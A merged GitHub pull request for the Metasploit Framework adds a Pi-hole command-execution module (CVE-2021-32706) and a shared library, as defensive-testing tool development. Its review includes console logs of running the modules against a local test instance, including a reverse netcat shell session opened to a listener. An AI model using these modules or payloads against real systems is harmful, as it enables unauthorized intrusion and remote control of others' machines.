
Add pihole cve-2021-32706 and create lib #16012

Merged (5 commits, Jan 12, 2022)
Conversation

h00die (Contributor) commented Jan 2, 2022

This PR adds an authenticated RCE to pihole (cve-2021-32706), which is VERY restrictive on what payloads it can run. As such, it's an aux module that is a one-shot for the command.

Noticing how much repetition there is between all my pihole modules, I've created a lib and spec to clean all that up. I've re-tested all the modules except pihole_whitelist_exec, since it's a pain to set up and very old and unlikely to still be used. However, it has the same changes as the other modules.

Verification

  • Start docker image
  • Start msfconsole
  • use auxiliary/admin/http/pihole_domains_api_exec
  • set rhosts [ip]
  • run
  • Verify you get command output
  • Document looks good
  • rspec runs w/o failures

space-r7 self-assigned this Jan 11, 2022

space-r7 (Contributor) commented:

Tested the aux module and pihole_dhcp_mac_exec

Modules
msf6 auxiliary(admin/http/pihole_domains_api_exec) > set COMMAND whoami
COMMAND => whoami
msf6 auxiliary(admin/http/pihole_domains_api_exec) > run
[*] Running module against 127.0.0.1

[+] Web Interface Version Detected: 5.3.1
[*] Using token: LsdpU/LyDEaS5fNCuXoh0lUTOdCz42q8LCyOVybQ4uU=
[*] Sending payload request
[*] Forcing gravity pull
[+] root
[*] Auxiliary module execution completed
msf6 > use pihole_dhcp_mac_exec
[*] Using configured payload cmd/unix/reverse_netcat

Matching Modules
================

   #  Name                                    Disclosure Date  Rank  Check  Description
   -  ----                                    ---------------  ----  -----  -----------
   0  exploit/unix/http/pihole_dhcp_mac_exec  2020-03-28       good  Yes    Pi-Hole DHCP MAC OS Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/http/pihole_dhcp_mac_exec

[*] Using exploit/unix/http/pihole_dhcp_mac_exec
msf6 exploit(unix/http/pihole_dhcp_mac_exec) > set lhost 192.168.140.105
lhost => 192.168.140.105
msf6 exploit(unix/http/pihole_dhcp_mac_exec) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf6 exploit(unix/http/pihole_dhcp_mac_exec) > options

Module options (exploit/unix/http/pihole_dhcp_mac_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    no        Password for Pi-Hole interface
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     127.0.0.1        yes       The target host(s), see https://github.com/rapid7/metasploit-f
                                         ramework/wiki/Using-Metasploit
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URI of the Pi-Hole Website
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.140.105  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


msf6 exploit(unix/http/pihole_dhcp_mac_exec) > set rport 8080
rport => 8080
msf6 exploit(unix/http/pihole_dhcp_mac_exec) > run

[*] Started reverse TCP handler on 192.168.140.105:4444
[*] Using token: jAWE4YISkYccugizdFxh8+pe/qpDWwu1xqLfjlFPCaU=
[+] System env path exploitable: /opt/pihole:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
[*] Payload MAC will be: 4FF8A18B1DDF
[*] Sending Exploit
[*] Attempting to clean 4C40BDB7B66E from config
[*] Attempting to clean 4FF8A18B1DDF from config
[*] Command shell session 1 opened (192.168.140.105:4444 -> 192.168.140.105:53491 ) at 2022-01-11 17:05:11 -0600


whoami
www-data

Tests
% bundle exec rspec spec/lib/msf/core/exploit/http/pihole_spec.rb
Run options: include {:focus=>true}

All examples were filtered out; ignoring {:focus=>true}

Randomized with seed 56623
Msf::Exploit::Remote::HTTP::Pihole ...............

Top 10 slowest examples (0.13234 seconds, 86.8% of total time):
  Msf::Exploit::Remote::HTTP::Pihole#pihole_versions returns 4.4, 4.3.3, 4.3.1 to version 4.4, 4.3.3, 4.3.1
    0.10718 seconds ./spec/lib/msf/core/exploit/http/pihole_spec.rb:102
  Msf::Exploit::Remote::HTTP::Pihole#pihole_logins returns nil on bad login
    0.00998 seconds ./spec/lib/msf/core/exploit/http/pihole_spec.rb:150
  Msf::Exploit::Remote::HTTP::Pihole#pihole_get_token returns token with slashes
    0.00425 seconds ./spec/lib/msf/core/exploit/http/pihole_spec.rb:206
  Msf::Exploit::Remote::HTTP::Pihole#pihole_get_token returns nil when no token
    0.00203 seconds ./spec/lib/msf/core/exploit/http/pihole_spec.rb:184
  Msf::Exploit::Remote::HTTP::Pihole#pihole_get_token returns token with slashes 3.3 format
    0.00195 seconds ./spec/lib/msf/core/exploit/http/pihole_spec.rb:217
  Msf::Exploit::Remote::HTTP::Pihole#pihole_logins returns cookie on valid login
    0.00154 seconds ./spec/lib/msf/core/exploit/http/pihole_spec.rb:161
  Msf::Exploit::Remote::HTTP::Pihole#pihole_versions vDev (HEAD) as of 4.3
    0.00148 seconds ./spec/lib/msf/core/exploit/http/pihole_spec.rb:124
  Msf::Exploit::Remote::HTTP::Pihole#pihole_versions returns 5.2.2, 5.2.2, 5.3.3 to version 5.2.2, 5.2.2, 5.3.3
    0.00135 seconds ./spec/lib/msf/core/exploit/http/pihole_spec.rb:80
  Msf::Exploit::Remote::HTTP::Pihole#pihole_versions returns nil if page can not be reached
    0.00131 seconds ./spec/lib/msf/core/exploit/http/pihole_spec.rb:37
  Msf::Exploit::Remote::HTTP::Pihole#pihole_get_token returns token without slashes
    0.00127 seconds ./spec/lib/msf/core/exploit/http/pihole_spec.rb:195

Finished in 0.15243 seconds (files took 5.99 seconds to load)
15 examples, 0 failures

space-r7 added a commit that referenced this pull request Jan 12, 2022
space-r7 merged commit 4354948 into rapid7:master Jan 12, 2022

space-r7 (Contributor) commented:

Release Notes

This adds an auxiliary module that executes commands against Pi-Hole versions <= 5.5. This also introduces a Pi-Hole library for common functionality required in exploits against the service.

space-r7 added the rn-modules label (release notes for new or majorly enhanced modules) Jan 12, 2022
h00die deleted the pihole_cleanup branch Jan 12, 2022 20:06